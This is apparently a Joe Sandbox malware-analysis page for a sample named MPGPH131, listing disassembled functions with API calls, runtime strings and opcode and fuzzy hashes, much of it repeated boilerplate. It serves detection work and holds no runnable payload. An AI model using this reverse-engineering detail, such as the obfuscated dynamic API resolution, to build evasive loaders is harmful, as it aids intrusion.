Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3efd8c89a7c24518b42e7d73edfa174541974a6bc97351ee868d3e397a29dbf1
Instruction ID: cb542aab21bf1b005bd036e32ac635eeccd9c91589c15a5efa77df23def8888d
Opcode Fuzzy Hash: 3efd8c89a7c24518b42e7d73edfa174541974a6bc97351ee868d3e397a29dbf1
Instruction Fuzzy Hash: A501A231940619EFCB159B54DC05FEEBBFAFB44B32F008629F819A2290DB759A44CA90

Function 0057A400 Relevance: 7.6, APIs: 5, Instructions: 118memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?), ref: 0057A478
GetProcAddress.KERNEL32(00000000,?), ref: 0057A483
GetProcessHeap.KERNEL32(?,?), ref: 0057A490
RtlAllocateHeap.NTDLL(00000000,00000000,00010000), ref: 0057A4A6
RtlAllocateHeap.NTDLL(?,00000000,00010000), ref: 0057A4DC

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Heap$Allocate$AddressHandleModuleProcProcess
String ID:
API String ID: 3330366720-0
Opcode ID: 80b8550d54cecd6cb2b04c3f5873e4b191f9fc60e2468660b57773ef8028d0f9
Instruction ID: 74c70e1e05b9f7882dd127e91a0d8a487676367ac59226a2e56006733d196021
Opcode Fuzzy Hash: 80b8550d54cecd6cb2b04c3f5873e4b191f9fc60e2468660b57773ef8028d0f9
Instruction Fuzzy Hash: 8A41E731A04348ABDB10DFE9EC88B9EBBB9EF89324F10416DE90CE7251D67159448BA5

Function 00575DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005760F2
___std_exception_destroy.LIBVCRUNTIME ref: 0057617F
___std_exception_copy.LIBVCRUNTIME ref: 00576248

Strings

recursive_directory_iterator::operator++, xrefs: 005761CC

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 2b73455c5e14795d587cee27cc92188ce4cafdde59252b77546ebf66d903ad0a
Instruction ID: 94fb78dab9a06c4ea8486905a2b5b42bfd3881907d14ebba699ef4a96e3a9948
Opcode Fuzzy Hash: 2b73455c5e14795d587cee27cc92188ce4cafdde59252b77546ebf66d903ad0a
Instruction Fuzzy Hash: E0E115B09006059FDB28DF68D845B9EFBF9FF44310F10861EE45697781E774AA48CBA1

Function 005784C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005786DE
___std_exception_destroy.LIBVCRUNTIME ref: 005786ED

Strings

, column , xrefs: 00578555, 0057856B
at line , xrefs: 00578518

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 388e7977b9ae18869e6fc078aebbebeb935a0133428aed56804951e330c7aa44
Instruction ID: 6020f7aa3f7c89ccae9f9840e55fa33693aa118d5697cc9bf809f3051704ca38
Opcode Fuzzy Hash: 388e7977b9ae18869e6fc078aebbebeb935a0133428aed56804951e330c7aa44
Instruction Fuzzy Hash: D9613F71900204AFDB08CF68DC89BADBFB6FF54310F14821DE419A7782DB74AA849795

Function 005E34C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005E3946
___std_exception_destroy.LIBVCRUNTIME ref: 005E395F
___std_exception_destroy.LIBVCRUNTIME ref: 005E3A97
___std_exception_destroy.LIBVCRUNTIME ref: 005E3AB0
___std_exception_destroy.LIBVCRUNTIME ref: 005E3C16
___std_exception_destroy.LIBVCRUNTIME ref: 005E3C2F
___std_exception_destroy.LIBVCRUNTIME ref: 005E4479
___std_exception_destroy.LIBVCRUNTIME ref: 005E4492

Strings

value, xrefs: 005E439F

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 389300136a14fb1aefb9bb9f51709706e747904e90d9774e20e2989ad6d31912
Instruction ID: 2063a5277d8beb501146bb48b69c36a3d64032476f61f5054fc75d28bbe13a20
Opcode Fuzzy Hash: 389300136a14fb1aefb9bb9f51709706e747904e90d9774e20e2989ad6d31912
Instruction Fuzzy Hash: 5E519D71C00298DBDB14DBA4CC99B9EBFB5BF05304F148259E449A7382D7756A888B61

Function 00573B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00573C0F

Part of subcall function 0064E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0064B17A,?,006A09CC,00000000,?,00000000,-006A65B0), ref: 0064E9CB

Strings

ios_base::eofbit set, xrefs: 00573BB6
ios_base::failbit set, xrefs: 00573AC8, 00573BB1
ios_base::badbit set, xrefs: 00573BA7, 00573BD2, 00573BF3

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: f2b8f0b6e0dacafade04c0a9a450e01c7165e0e1a84456768d78c23678690c36
Instruction ID: 0d9caaa546c0001440cf2de3432e7ca636dc8f30e409ee65f6add67a7f9bdaf4
Opcode Fuzzy Hash: f2b8f0b6e0dacafade04c0a9a450e01c7165e0e1a84456768d78c23678690c36
Instruction Fuzzy Hash: 7F11F0B2900708ABC710DF68E805A9ABBEDBF05320F14C52AF95C9B641F771A9149BA1

Function 00662622 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(FAAA2064,00000000,00000000,?), ref: 00662685

Part of subcall function 00668463: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0066406B,?,00000000,-00000008), ref: 006684C4

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006628D7
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0066291D
GetLastError.KERNEL32 ref: 006629C0

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: a62f1481ad6d9ac293be52a7c779263690d720e0dc05d27b7a889ec89e52962d
Instruction ID: f17b1413410d9dca8c03b7b7d326bb3eb05e5e4af0e19ec35f7f7405bd07649d
Opcode Fuzzy Hash: a62f1481ad6d9ac293be52a7c779263690d720e0dc05d27b7a889ec89e52962d
Instruction Fuzzy Hash: 9BD19C75E006499FCF05CFE8D8909EDBBB6FF49310F18466AE456EB351D630A942CB50

Function 0057A5B0 Relevance: 6.1, APIs: 4, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(B6BDACB9), ref: 0057A619
GetProcAddress.KERNEL32(00000000,AF88AC99), ref: 0057A624
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0057A6A2
SetEvent.KERNEL32(00000000), ref: 0057A6A9

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Event$AddressCreateHandleModuleProc
String ID:
API String ID: 2341598627-0
Opcode ID: ee9f8b35cf51ce4c90e999790022f32240235b902f37b4d3129c1c1922229809
Instruction ID: ce44afcf5519c3579bb0b83363dca2b88c9bb4940be3ec3b9a0b540ff07963ab
Opcode Fuzzy Hash: ee9f8b35cf51ce4c90e999790022f32240235b902f37b4d3129c1c1922229809
Instruction Fuzzy Hash: 7B31C171914388EAEF04DFE4DC09BEEBBB9EF18304F10006DE545AA251E7B25648C7A6

Function 0064B305 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000400,?,?,?,?,00000000,00000000,?,?,?,005D979F,00000000,?,?,00000000), ref: 0064B322
GetLastError.KERNEL32(?,005D979F,00000000,?,?,00000000,00000000,?,?), ref: 0064B32E
WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,005D979F,00000000,?,?,00000000,00000000,?), ref: 0064B354
GetLastError.KERNEL32(?,005D979F,00000000,?,?,00000000,00000000,?,?), ref: 0064B360

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: e8352121b1e2d14478df51de9c48f4102c9df151a8fc5b30d06c12291fbe35cd
Instruction ID: dff0b9cac6ede44f8ec709af540abcc6cfaaef23b490fa9d951451b010822e2b
Opcode Fuzzy Hash: e8352121b1e2d14478df51de9c48f4102c9df151a8fc5b30d06c12291fbe35cd
Instruction Fuzzy Hash: 60017236600155BBCF231F56DC08D9F3E67FBD97A5B546024FE1555220C731C862E7A1

Function 00671C22 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00656AF7,00000000,00000000,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000), ref: 00671C39
GetLastError.KERNEL32(?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?,?,?,00662FEE,00000000), ref: 00671C45

Part of subcall function 00671C0B: CloseHandle.KERNEL32(FFFFFFFE,00671C55,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?,?), ref: 00671C1B

___initconout.LIBCMT ref: 00671C55

Part of subcall function 00671BCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00671BFC,0066E98C,?,?,00662A14,?,00000000,00000000,?), ref: 00671BE0

WriteConsoleW.KERNEL32(00000000,00000000,00656AF7,00000000,?,0066E99F,00000000,00000001,?,?,?,00662A14,?,00000000,00000000,?), ref: 00671C6A

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 818ff077e8b47b57c76a38f1ff6e9370c9cd0581a008383efa80f9e30f0ba558
Instruction ID: af2f14e9fee3c8f912861ca6fa16226ec524f9f9829eb3809ce26e06098267bd
Opcode Fuzzy Hash: 818ff077e8b47b57c76a38f1ff6e9370c9cd0581a008383efa80f9e30f0ba558
Instruction Fuzzy Hash: 08F01C36140129BBCF226FD9DC08A893F27FB0A3A1F008119FA1D99620C632C9609B90

Function 005E2A60 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 005E2F43

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: ac96d36ac91a1ded2ad4e5f893d5ebdcaefcd6de770654d9d4cd7c37a63712f6
Instruction ID: 0572a0fc90abdac97d34035cbdb5c0b3affa57a6f1548e447d6c34aa93b5a78a
Opcode Fuzzy Hash: ac96d36ac91a1ded2ad4e5f893d5ebdcaefcd6de770654d9d4cd7c37a63712f6
Instruction Fuzzy Hash: 16E1F571A001459FCB18DF69C885A6DBBB9FF88310F24836AE859DB395E730ED41CB90

Function 00578080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0057844D

Strings

ror, xrefs: 005780D4
parse error, xrefs: 00578149, 00578162

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 02c59634e9b8c7c7a731144dabbdfa952a9ed72f14cac93897f9034302d3c3c9
Instruction ID: 80d1fa4a4c241bb656b9895fb3e782abb6bb315f31c8fd7d556fcef8972cf41b
Opcode Fuzzy Hash: 02c59634e9b8c7c7a731144dabbdfa952a9ed72f14cac93897f9034302d3c3c9
Instruction Fuzzy Hash: A4C10671D106498FEB08CF68DC88BADBB72BF55304F14C24DE008AB792DBB49684DB91

Function 00577DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00578051
___std_exception_destroy.LIBVCRUNTIME ref: 00578060

Strings

[json.exception., xrefs: 00577E1C

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
